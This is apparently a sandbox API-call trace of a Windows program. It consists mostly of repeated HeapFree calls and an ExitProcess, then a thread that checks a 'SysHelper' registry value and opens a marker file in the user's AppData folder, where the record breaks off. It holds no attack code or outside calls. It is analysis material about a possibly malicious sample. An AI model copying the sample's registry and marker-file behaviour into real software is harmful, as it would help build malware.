[0204.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94cd0 | out: hHeap=0x620000) returned 1 [0204.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94cf8 | out: hHeap=0x620000) returned 1 [0204.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94d20 | out: hHeap=0x620000) returned 1 [0204.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94d48 | out: hHeap=0x620000) returned 1 [0204.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd94c0 | out: hHeap=0x620000) returned 1 [0204.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd94f8 | out: hHeap=0x620000) returned 1 [0204.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94d70 | out: hHeap=0x620000) returned 1 [0204.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94d98 | out: hHeap=0x620000) returned 1 [0204.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94dc0 | out: hHeap=0x620000) returned 1 [0204.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94de8 | out: hHeap=0x620000) returned 1 [0204.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e10 | out: hHeap=0x620000) returned 1 [0204.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05040 | out: hHeap=0x620000) returned 1 [0204.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0de30 | out: hHeap=0x620000) returned 1 [0204.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0cde8 | out: hHeap=0x620000) returned 1 [0204.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x667160 | out: hHeap=0x620000) returned 1 [0204.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x667490 | out: hHeap=0x620000) returned 1 [0204.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9258 | out: hHeap=0x620000) returned 1 [0204.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddaf8 | out: hHeap=0x620000) returned 1 [0204.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddab0 | out: hHeap=0x620000) returned 1 [0204.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f2b8 | out: hHeap=0x620000) returned 1 [0204.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ba0 | out: hHeap=0x620000) returned 1 [0204.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0204.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0204.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0204.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65e138 | out: hHeap=0x620000) returned 1 [0204.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c92f70 | out: hHeap=0x620000) returned 1 [0204.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332d0 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd2d28 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd35b0 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd3e38 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd46c0 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4520 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd1c18 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e428d8 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e48ca0 | out: hHeap=0x620000) returned 1 [0204.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e30048 | out: hHeap=0x620000) returned 1 [0204.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d09a20 | out: hHeap=0x620000) returned 1 [0204.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d09208 | out: hHeap=0x620000) returned 1 [0204.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d089f0 | out: hHeap=0x620000) returned 1 [0204.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2c38 | out: hHeap=0x620000) returned 1 [0204.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e320b8 | out: hHeap=0x620000) returned 1 [0204.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e33118 | out: hHeap=0x620000) returned 1 [0204.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e33950 | out: hHeap=0x620000) returned 1 [0204.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e34188 | out: hHeap=0x620000) returned 1 [0204.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e349c0 | out: hHeap=0x620000) returned 1 [0204.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e35a38 | out: hHeap=0x620000) returned 1 [0204.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e351f8 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e328e0 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e36ac8 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e37b60 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e383b8 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e36280 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e37310 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e39450 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3a4e0 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e39c98 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3ad28 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3b560 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e38c10 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3bd98 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3c5c0 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3d618 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3e688 | out: hHeap=0x620000) returned 1 [0204.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3cde8 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca6de8 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3f710 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3ff68 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca7670 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca7ef8 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3eec0 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e41000 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e42090 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e3de50 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e407c0 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e41848 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca8780 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca9008 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2caa118 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e43108 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e44178 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2caa9a0 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e45200 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e45a58 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cab228 | out: hHeap=0x620000) returned 1 [0204.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cabab0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e449b0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e46af0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e47b80 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e43940 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e462b0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e47338 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca9890 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cacbc0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cad448 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cac338 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccd7d8 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cce060 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e494f0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e49d48 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cce8e8 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccf170 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccf9f8 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4a5a0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd0280 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd0b08 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd1390 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cadcd0 | out: hHeap=0x620000) returned 1 [0204.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd24a0 | out: hHeap=0x620000) returned 1 [0204.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e483c8 | out: hHeap=0x620000) returned 1 [0204.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0e648 | out: hHeap=0x620000) returned 1 [0204.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb43e8 | out: hHeap=0x620000) returned 1 [0204.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0eea0 | out: hHeap=0x620000) returned 1 [0204.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d608 | out: hHeap=0x620000) returned 1 [0204.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d008e0 | out: hHeap=0x620000) returned 1 [0204.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfffe8 | out: hHeap=0x620000) returned 1 [0204.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e743b0 | out: hHeap=0x620000) returned 1 [0204.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e74c38 | out: hHeap=0x620000) returned 1 [0204.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e754c0 | out: hHeap=0x620000) returned 1 [0204.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e75d48 | out: hHeap=0x620000) returned 1 [0204.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4450 | out: hHeap=0x620000) returned 1 [0204.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6ce10 | out: hHeap=0x620000) returned 1 [0204.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e72258 | out: hHeap=0x620000) returned 1 [0204.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e72a70 | out: hHeap=0x620000) returned 1 [0204.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6d698 | out: hHeap=0x620000) returned 1 [0204.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6df20 | out: hHeap=0x620000) returned 1 [0204.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6e7a8 | out: hHeap=0x620000) returned 1 [0204.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e732a0 | out: hHeap=0x620000) returned 1 [0204.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e73b28 | out: hHeap=0x620000) returned 1 [0204.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5d88 | out: hHeap=0x620000) returned 1 [0204.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4b688 | out: hHeap=0x620000) returned 1 [0204.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4bf10 | out: hHeap=0x620000) returned 1 [0204.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4c798 | out: hHeap=0x620000) returned 1 [0204.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4d020 | out: hHeap=0x620000) returned 1 [0204.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4d8a8 | out: hHeap=0x620000) returned 1 [0204.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d079c8 | out: hHeap=0x620000) returned 1 [0204.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4e130 | out: hHeap=0x620000) returned 1 [0204.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4e9b8 | out: hHeap=0x620000) returned 1 [0204.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5ade8 | out: hHeap=0x620000) returned 1 [0204.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5b630 | out: hHeap=0x620000) returned 1 [0204.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5be88 | out: hHeap=0x620000) returned 1 [0204.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4f240 | out: hHeap=0x620000) returned 1 [0204.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4fac8 | out: hHeap=0x620000) returned 1 [0204.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5c6e0 | out: hHeap=0x620000) returned 1 [0204.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5cf28 | out: hHeap=0x620000) returned 1 [0204.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e50350 | out: hHeap=0x620000) returned 1 [0204.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x620000) returned 1 [0204.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x620000) returned 1 [0204.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x620000) returned 1 [0204.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e52570 | out: hHeap=0x620000) returned 1 [0204.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e52df8 | out: hHeap=0x620000) returned 1 [0204.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e53680 | out: hHeap=0x620000) returned 1 [0204.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e53f08 | out: hHeap=0x620000) returned 1 [0204.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e54790 | out: hHeap=0x620000) returned 1 [0204.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x620000) returned 1 [0204.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5d770 | out: hHeap=0x620000) returned 1 [0204.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5dfc8 | out: hHeap=0x620000) returned 1 [0204.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e558a0 | out: hHeap=0x620000) returned 1 [0204.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e56128 | out: hHeap=0x620000) returned 1 [0204.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e569b0 | out: hHeap=0x620000) returned 1 [0204.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5e820 | out: hHeap=0x620000) returned 1 [0204.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5f068 | out: hHeap=0x620000) returned 1 [0204.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e57238 | out: hHeap=0x620000) returned 1 [0204.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e57ac0 | out: hHeap=0x620000) returned 1 [0204.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e58348 | out: hHeap=0x620000) returned 1 [0204.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e58bd0 | out: hHeap=0x620000) returned 1 [0204.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e59458 | out: hHeap=0x620000) returned 1 [0204.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e59ce0 | out: hHeap=0x620000) returned 1 [0204.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e5f8c8 | out: hHeap=0x620000) returned 1 [0204.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e60150 | out: hHeap=0x620000) returned 1 [0204.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e609d8 | out: hHeap=0x620000) returned 1 [0204.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6f8b0 | out: hHeap=0x620000) returned 1 [0204.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e70108 | out: hHeap=0x620000) returned 1 [0204.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e61260 | out: hHeap=0x620000) returned 1 [0204.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e61ae8 | out: hHeap=0x620000) returned 1 [0204.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e62370 | out: hHeap=0x620000) returned 1 [0204.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e70960 | out: hHeap=0x620000) returned 1 [0204.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e62bf8 | out: hHeap=0x620000) returned 1 [0204.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e63480 | out: hHeap=0x620000) returned 1 [0204.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e63d08 | out: hHeap=0x620000) returned 1 [0204.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e64590 | out: hHeap=0x620000) returned 1 [0204.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e64e18 | out: hHeap=0x620000) returned 1 [0204.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e656a0 | out: hHeap=0x620000) returned 1 [0204.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e65f28 | out: hHeap=0x620000) returned 1 [0204.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e667b0 | out: hHeap=0x620000) returned 1 [0204.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e67038 | out: hHeap=0x620000) returned 1 [0204.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e678c0 | out: hHeap=0x620000) returned 1 [0204.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e711a8 | out: hHeap=0x620000) returned 1 [0204.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e71a00 | out: hHeap=0x620000) returned 1 [0204.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e68148 | out: hHeap=0x620000) returned 1 [0204.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e689d0 | out: hHeap=0x620000) returned 1 [0204.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e69258 | out: hHeap=0x620000) returned 1 [0204.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e69ae0 | out: hHeap=0x620000) returned 1 [0204.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6a368 | out: hHeap=0x620000) returned 1 [0204.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6abf0 | out: hHeap=0x620000) returned 1 [0204.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6b478 | out: hHeap=0x620000) returned 1 [0204.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6bd00 | out: hHeap=0x620000) returned 1 [0204.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e6c588 | out: hHeap=0x620000) returned 1 [0204.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e31970 | out: hHeap=0x620000) returned 1 [0204.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d071b0 | out: hHeap=0x620000) returned 1 [0204.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb44b8 | out: hHeap=0x620000) returned 1 [0204.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d06138 | out: hHeap=0x620000) returned 1 [0204.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e4ae00 | out: hHeap=0x620000) returned 1 [0204.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e31158 | out: hHeap=0x620000) returned 1 [0204.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e30860 | out: hHeap=0x620000) returned 1 [0204.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641fd0 | out: hHeap=0x620000) returned 1 [0204.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x640110 | out: hHeap=0x620000) returned 1 [0204.436] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0204.436] ExitProcess (uExitCode=0x0) [0204.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63f4a8 | out: hHeap=0x620000) returned 1 Thread: id = 124 os_tid = 0x594 Thread: id = 125 os_tid = 0x5c8 Thread: id = 126 os_tid = 0x59c Thread: id = 127 os_tid = 0x590 Thread: id = 128 os_tid = 0x58c Thread: id = 129 os_tid = 0x5f4 Thread: id = 130 os_tid = 0x520 Thread: id = 180 os_tid = 0x3b8 [0181.248] timeGetTime () returned 0xcf1a [0181.248] GetLastError () returned 0x54f [0181.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x2d0c5d8 [0181.261] GetCurrentThreadId () returned 0x3b8 [0181.261] SetLastError (dwErrCode=0x54f) [0181.261] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x922a5e4 | out: phkResult=0x922a5e4*=0x4f0) returned 0x0 [0181.261] RegQueryValueExW (in: hKey=0x4f0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x922a5d8, lpData=0x922a5e0, lpcbData=0x922a5dc*=0x4 | out: lpType=0x922a5d8*=0x4, lpData=0x922a5e0*=0x1, lpcbData=0x922a5dc*=0x4) returned 0x0 [0181.261] RegCloseKey (hKey=0x4f0) returned 0x0 [0181.261] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x922a4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0181.262] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0181.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x646388 [0181.290] AreFileApisANSI () returned 1 [0181.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x922a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0181.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6734e8 [0181.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x922a4e4, cbMultiByte=-1, lpWideCharStr=0x6734e8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0181.305] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x922a368, 